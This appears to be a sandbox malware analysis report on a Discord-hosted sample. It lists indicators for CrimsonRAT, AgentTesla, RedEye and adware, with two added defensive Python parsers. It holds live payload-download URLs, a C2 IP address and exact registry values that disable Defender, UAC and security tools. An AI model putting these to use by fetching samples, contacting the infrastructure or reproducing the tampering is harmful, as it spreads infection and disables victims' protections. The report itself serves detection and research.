Analysis
max time kernel: 575s
max time network: 576s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-08-2024 04:28
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://cdn.discordapp.com/attachments/1214735818472558646/1270183447918415902/robloxapp-20240802-1831583.wmv?ex=66b2c604&is=66b17484&hm=55b47e3987876be3720559b84781030d4a7f07fe97e2f75d58130ab55a74205c&
Resource: win10v2004-20240802-en
Errors
General
Target: https://cdn.discordapp.com/attachments/1214735818472558646/1270183447918415902/robloxapp-20240802-1831583.wmv?ex=66b2c604&is=66b17484&hm=55b47e3987876be3720559b84781030d4a7f07fe97e2f75d58130ab55a74205c&
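The target is a signed Discord CDN attachment link: the `ex` and `is` parameters are the expiry and issue time as hex Unix seconds and `hm` is the signature, so the link only resolves inside that window. The following is an added example (not part of the Triage output) that decodes the window from the URL above and checks whether the link was still live at the submission time shown; it assumes the report's DD-MM-YYYY timestamp is UTC.

```python
"""Decode the signed-URL parameters on a Discord CDN attachment link.

Added example for this report; it is not part of the sandbox output. Discord
appends three parameters to cdn.discordapp.com attachment links: ``ex``
(expiry, Unix seconds in hex), ``is`` (issue time, Unix seconds in hex) and
``hm`` (hex signature). Past ``ex`` the CDN refuses the link, so a sample URL
in a report is only retrievable inside that window.
"""
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

# Target URL exactly as shown in the report above.
TARGET = (
    "https://cdn.discordapp.com/attachments/1214735818472558646/"
    "1270183447918415902/robloxapp-20240802-1831583.wmv"
    "?ex=66b2c604&is=66b17484"
    "&hm=55b47e3987876be3720559b84781030d4a7f07fe97e2f75d58130ab55a74205c&"
)


def decode_attachment_url(url):
    """Split a Discord attachment URL into ids, filename and validity window."""
    parts = urlparse(url)
    if parts.hostname not in ("cdn.discordapp.com", "media.discordapp.net"):
        raise ValueError(f"not a Discord CDN host: {parts.hostname}")
    # path layout: /attachments/<channel_id>/<attachment_id>/<filename>
    segments = parts.path.split("/")
    if len(segments) != 5 or segments[1] != "attachments":
        raise ValueError(f"unexpected attachment path: {parts.path}")
    qs = parse_qs(parts.query)  # the trailing '&' produces no empty key
    try:
        issued = int(qs["is"][0], 16)
        expires = int(qs["ex"][0], 16)
        signature = qs["hm"][0]
    except (KeyError, ValueError) as exc:
        raise ValueError("link lacks ex/is/hm (unsigned legacy link?)") from exc
    return {
        "channel_id": segments[2],
        "attachment_id": segments[3],
        "filename": segments[4],
        "issued_epoch": issued,
        "expires_epoch": expires,
        "lifetime_seconds": expires - issued,
        "signature": signature,
        "issued_utc": datetime.fromtimestamp(issued, tz=timezone.utc),
        "expires_utc": datetime.fromtimestamp(expires, tz=timezone.utc),
    }


def parse_report_time(text):
    """The report shows submission time as DD-MM-YYYY HH:MM; assumed UTC."""
    return datetime.strptime(text, "%d-%m-%Y %H:%M").replace(tzinfo=timezone.utc)


def link_valid_at(info, when):
    """True if the signed link is inside its validity window at ``when``."""
    return info["issued_utc"] <= when < info["expires_utc"]


if __name__ == "__main__":
    info = decode_attachment_url(TARGET)
    submitted = parse_report_time("06-08-2024 04:28")
    print(f"{info['filename']}: valid {info['issued_utc']:%Y-%m-%d %H:%M:%S}Z"
          f" to {info['expires_utc']:%Y-%m-%d %H:%M:%S}Z"
          f" ({info['lifetime_seconds'] // 3600} h); "
          f"live at submission: {link_valid_at(info, submitted)}")
```

For this URL the link was issued 2024-08-06 00:55:32 UTC with a 24 h lifetime, so it was live when the sample was submitted at 04:28 the same day and dead a day later; anyone re-pulling the sample from the report needs a refreshed link.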
Malware Config
Extracted
http://blockchainjoblist.com/wp-admin/014080/
https://womenempowermentpakistan.com/wp-admin/paba5q52/
https://atnimanvilla.com/wp-content/073735/
https://yeuquynhnhai.com/upload/41830/
https://deepikarai.com/js/4bzs6/
Extracted
crimsonrat
185.136.161.124
Signatures
CrimsonRat
Crimson RAT is a remote access trojan attributed to a Pakistan-linked threat actor.
Windows Defender real-time protection policy modified by RedEye.exe:
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | RedEye.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | RedEye.exe
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4752 | 6812 | powershell.exe | 356
UAC policy (EnableLUA) modified by RedEye.exe:
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | RedEye.exe
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
Blocklisted process makes network request 4 IoCs
flow | pid | Process
494 | 4752 | powershell.exe
498 | 4752 | powershell.exe
501 | 4752 | powershell.exe
504 | 4752 | powershell.exe
Disables RegEdit via registry modification 2 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | RedEye.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | RedEye.exe
Disables Task Manager via registry modification
Disables use of System Restore points 1 TTPs
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
All 64 operations are performed by RedEye.exe under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. Windows starts whatever an image's Debugger value names instead of the image itself; because "RIP" is not an executable, every launch of the listed tools (Task Manager, cmd, PowerShell, mmc, rstrui, the browsers and the anti-malware/cleanup utilities) fails until the keys are removed (MITRE ATT&CK T1546.012).
Key created (31 images): mb3-setup-1878.1878-3.3.1.2183.exe, Rkill64.scr, HitmanPro.exe, taskmgr.exe, cmd.exe, mspaint.exe, bcdedit.exe, logoff.exe, iExplore64.exe, mmc.exe, Autoruns.exe, powershell.exe, RKill.exe, microsoftedge.exe, microsoftedgecp.exe, mbam.exe, rstrui.exe, opera.exe, taskkill.exe, RKill64.exe, rkill-unsigned64.exe, AdwCleaner.exe, notepad.exe, MSASCuiL.exe, ZAM.exe, msconfig.exe, firefox.exe, Rkill.com, sethc.exe, control.exe, Rkill.scr
Set value (str) <image>\Debugger = "RIP" (33 images): mb3-setup-1878.1878-3.3.1.2183.exe, HitmanPro.exe, HitmanPro_x64.exe, microsoftedgecp.exe, yandex.exe, recoverydrive.exe, RKill.exe, Rkill.scr, RKill64.exe, notepad++.exe, notepad.exe, attrib.exe, rkill-unsigned.exe, cmd.exe, powershell.exe, logoff.exe, rstrui.exe, Rkill64.com, taskmgr.exe, chrome.exe, rkill-unsigned64.exe, Rkill.com, AdwCleaner.exe, ComboFix.exe, Autoruns64.exe, iexplore.exe, mmc.exe, mbam.exe, firefox.exe, sethc.exe, UserAccountControlSettings.exe, Rkill64.scr, ZAM.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
pid | Process
5896 | NetSh.exe
Checks computer location settings 2 TTPs 42 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process (count)
Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | wavebrowser.exe (34), CrimsonRAT.exe (3), SWUpdater.exe (3), Wave Browser.exe (1), RedEye.exe (1)
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Executes dropped EXE 64 IoCs
Process | pids
YouAreAnIdiot.exe | 712, 1684, 3248, 4532, 2216, 4504
butterflyondesktop.exe | 2284, 2456, 2320
butterflyondesktop.tmp | 3780, 1796, 4484
ButterflyOnDesktop.exe | 5084
Wave Browser.exe | 1228, 4552, 2664
SWUpdaterSetup.exe | 3216
SWUpdater.exe | 4868, 5160, 5304, 5348, 5404, 5644
SWUpdaterComRegisterShell64.exe | 5188, 5212, 5232
WaveInstaller-v1.5.18.2.exe | 5748
setup.exe | 5828, 5848, 2892, 1892
wavebrowser.exe | 3796, 5572, 1056, 3760, 4680, 5716, 1472, 5884, 5152, 6028, 5636, 4132, 5160, 3644, 5272, 5268, 3712, 1644, 3648, 3480, 620, 4772, 5844, 1608, 5540, 6056, 6276, 6364, 6384, 6508, 6668, 6700, 6820
pid 5160 is listed for both SWUpdater.exe and wavebrowser.exe: pids are reused during the run, so correlate events on the report's process ids rather than on pid alone.
Loads dropped DLL 64 IoCs
Process | pid (load events)
SWUpdater.exe | 4868 (1), 5160 (4), 5304 (1), 5348 (2), 5404 (2), 5644 (1)
SWUpdaterComRegisterShell64.exe | 5188 (1), 5212 (1), 5232 (1)
wavebrowser.exe | 3796 (2), 5572 (1), 1056 (8), 3760 (2), 4680 (2), 1472 (2), 5884 (2), 5716 (2), 5152 (2), 6028 (2), 5636 (2), 4132 (2), 5160 (2), 3644 (2), 5272 (2), 5268 (1), 3712 (2), 5844 (2), 1644 (2), 3648 (2), 1608 (2), 3480 (2), 620 (2)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application 2 TTPs 11 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe" | ButterflyOnDesktop.exe (5 times)
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop | butterflyondesktop.tmp
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wavesor SWUpdater = "\"C:\\Users\\Admin\\Wavesor Software\\SWUpdater\\1.3.133.0\\SWUpdaterCore.exe\"" | SWUpdater.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tbibra_dreb = "C:\\ProgramData\\Hdlharas\\dlrarhsiva.exe" | dlrarhsiva.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Downloads\\RedEye.exe" | RedEye.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Downloads\\RedEye.exe" | RedEye.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Downloads\\RedEye.exe" | RedEye.exe
RedEye.exe registers itself three times (HKLM, the WOW6432Node view and HKCU) under the value name "Windows Update" while pointing at a file in the user's Downloads folder; that name/path mismatch, like the ProgramData path behind tbibra_dreb, is the detection handle.
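The registry rows in this report (the Defender, EnableLUA and DisableRegistryTools policy changes, the IFEO Debugger entries and the Run keys just listed) all share one flattened format: operation, registry path, optional quoted value, acting process. The following added example (not vendor code and not taken from any sample on this page) parses that format and turns each row into a finding. SAMPLE_ROWS are copied from this report; the two heuristics, a Debugger value that does not name an executable and a Run value name that mimics a Windows component, are the example's own assumptions.

```python
"""Classify flattened registry IoC rows into tamper, IFEO-hijack and Run-key findings.

Added example; not vendor code and not from any sample on this page. Rows have
the form shown in this report: <op> <registry path>[ = "<value>"] <process>.
SAMPLE_ROWS are copied from the report; the heuristics (a Debugger value that
is not an executable, a Run value name that mimics a Windows component) are
this example's own.
"""
import re
from dataclasses import dataclass

ROW_RE = re.compile(
    r'^(?P<op>Key created|Key value queried|Set value \((?:int|str)\))\s+'
    r'(?P<path>\\REGISTRY\\.+?)'        # lazy: stops before ' = "' or the process
    r'(?:\s=\s"(?P<value>.*)")?'
    r'\s+(?P<process>\S+)$'
)
IFEO_PREFIX = (r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options" + "\\")
RUN_MARK = r"\Microsoft\Windows\CurrentVersion\Run" + "\\"
# registry path suffix -> (value that means "tampered", label)
TAMPER = {
    r"Windows Defender\Real-Time Protection\DisableRealtimeMonitoring": ("1", "Defender real-time protection disabled"),
    r"Policies\System\EnableLUA": ("0", "UAC disabled"),
    r"Policies\System\DisableRegistryTools": ("1", "Registry Editor blocked"),
    r"Policies\System\DisableTaskMgr": ("1", "Task Manager blocked"),
}


@dataclass(frozen=True)
class Finding:
    kind: str        # "tamper" | "ifeo_hijack" | "run_key"
    process: str
    detail: str
    suspicious: bool


def parse_row(row):
    """Return {op, path, value, process} or None for a row that does not parse.
    The report escapes quotes and backslashes inside values; undo that."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    rec = m.groupdict()
    if rec["value"] is not None:
        rec["value"] = rec["value"].replace('\\"', '"').replace("\\\\", "\\")
    return rec


def classify(rec):
    op, path, value, proc = rec["op"], rec["path"], rec["value"], rec["process"]
    if op.startswith("Set value"):
        for suffix, (bad, label) in TAMPER.items():
            if path.endswith(suffix) and value == bad:
                return Finding("tamper", proc, label, True)
    if path.startswith(IFEO_PREFIX):
        image, *rest = path[len(IFEO_PREFIX):].split("\\")
        if rest == ["Debugger"] and value is not None:
            # Windows launches the Debugger value instead of the image. A real
            # debugger names an executable; anything else (here "RIP") simply
            # makes every start of that image fail.
            bogus = re.search(r"(?i)[a-z]:\\|\.exe\b", value) is None
            return Finding("ifeo_hijack", proc, f"{image} -> Debugger={value!r}", bogus)
        return None
    if RUN_MARK in path and value is not None:
        name = path.split(RUN_MARK, 1)[1]
        target = value.strip('"')
        user_writable = "\\users\\" in target.lower() or "\\programdata\\" in target.lower()
        masquerade = re.match(r"(?i)^(windows|microsoft)\b", name) is not None
        return Finding("run_key", proc, f"{name} = {target}", user_writable or masquerade)
    return None


def analyse(rows):
    """Parse every row and keep those that yield a finding, in input order."""
    recs = (parse_row(r) for r in rows)
    return [f for f in (classify(r) for r in recs if r) if f]


def summarize(findings):
    return {k: sum(f.kind == k for f in findings) for k in {f.kind for f in findings}}


# Rows copied verbatim from the report above (raw string keeps the escaping).
SAMPLE_ROWS = r'''
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection RedEye.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" RedEye.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" RedEye.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" RedEye.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe RedEye.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "RIP" RedEye.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "RIP" RedEye.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe" ButterflyOnDesktop.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wavesor SWUpdater = "\"C:\\Users\\Admin\\Wavesor Software\\SWUpdater\\1.3.133.0\\SWUpdaterCore.exe\"" SWUpdater.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Downloads\\RedEye.exe" RedEye.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tbibra_dreb = "C:\\ProgramData\\Hdlharas\\dlrarhsiva.exe" dlrarhsiva.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop butterflyondesktop.tmp
'''.strip().splitlines()

if __name__ == "__main__":
    found = analyse(SAMPLE_ROWS)
    print(summarize(found))
    for f in found:
        print(("!! " if f.suspicious else "   ") + f"{f.kind:<12} {f.process:<24} {f.detail}")
```

On the rows above this yields three tamper findings, two IFEO hijacks (both with the bogus debugger "RIP") and four Run keys, of which only the Butterfly entry under Program Files is left unflagged; "Key created" and "Key value queried" rows, and the Run row written without a value, parse but produce no finding.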
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
UAC policy (EnableLUA) read and modified:
description | ioc | Process (count)
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | SWUpdater.exe (12)
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | RedEye.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
88 | raw.githubusercontent.com
89 | raw.githubusercontent.com
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x000800000002359a-516.dat | autoit_exe
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | wavebrowser.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | wavebrowser.exe
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description | ioc | Process
File created | C:\autorun.inf | RedEye.exe
File opened for modification | C:\autorun.inf | RedEye.exe
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\WallPaper = "C:\\redeyebmp.bmp" | RedEye.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\WallPaper = "C:\\redeyebmp.bmp" | RedEye.exe
Drops file in Program Files directory 64 IoCs
Process | description | ioc
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\manifest.fingerprint plus 38 two-letter country files in the same directory: VN, NI, LS, IQ, PE, NR, BH, SL, ET, GW, CA, TC, BY, PK, GB, SB, PG, CY, BT, AS, SM, SK, KW, TM, RE, SI, ZA, PA, ML, BN, ZW, TR, MY, MD, HN, GA, EH, EG
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_992455320\manifest.fingerprint and C:\Program Files\chrome_Unpacker_BeginUnzipping3796_992455320\_metadata\verified_contents.json
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1827865981\manifest.fingerprint
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_634507433\manifest.json and C:\Program Files\chrome_Unpacker_BeginUnzipping3796_634507433\_metadata\verified_contents.json
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_785369388\manifest.json
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1119211596\manifest.json
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1838504521\_metadata\verified_contents.json
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_925778115\manifest.json
wavebrowser.exe | File created | C:\Program Files\chrome_Unpacker_BeginUnzipping3796_564898447\_platform_specific\win_x64\widevinecdm.dll and C:\Program Files\chrome_Unpacker_BeginUnzipping3796_564898447\_platform_specific\win_x64\widevinecdm.dll.sig
WINWORD.EXE | File opened for modification | C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BasicElegant.dotx, Centered.dotx and Word2013BW.dotx
WINWORD.EXE | File created | C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$sicElegant.dotx
SWUpdaterSetup.exe | File created | C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdaterBroker.exe, SWUpdaterOnDemand.exe, SWUpdaterSetup.exe and SWUpdaterCore.exe
butterflyondesktop.tmp | File created | C:\Program Files (x86)\Butterfly on Desktop\is-VG5JL.tmp
butterflyondesktop.tmp | File opened for modification | C:\Program Files (x86)\Butterfly on Desktop\unins000.dat
AgentTesla.exe | File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config, Microsoft.Management.Infrastructure.dll and MaterialDesignColors.dll
AgentTesla.exe | File opened for modification | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config
The 3796 in the chrome_Unpacker_BeginUnzipping3796_* directory names is the pid of the first wavebrowser.exe instance under Executes dropped EXE, which ties the 50 component-unpacking writes to that process.
Drops file in Windows directory 1 IoCs
description ioc Process
File created C:\Windows\Nope.txt RedEye.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh NetSh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh NetSh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh NetSh.exe
Program crash 4 IoCs
pid pid_target Process procid_target
3708 712 WerFault.exe 124
5052 4532 WerFault.exe 131
4824 2216 WerFault.exe 134
428 4504 WerFault.exe 139
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WaveInstaller-v1.5.18.2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdaterSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AgentTesla.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 
AgentTesla.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process
5304 SWUpdater.exe
5644 SWUpdater.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer wavebrowser.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS wavebrowser.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName wavebrowser.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE
Interacts with shadow copies 3 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
540 vssadmin.exe
3056 vssadmin.exe
6068 vssadmin.exe
Modifies data under HKEY_USERS 17 IoCs
description ioc Process
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133673923132494951" wavebrowser.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry wavebrowser.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe
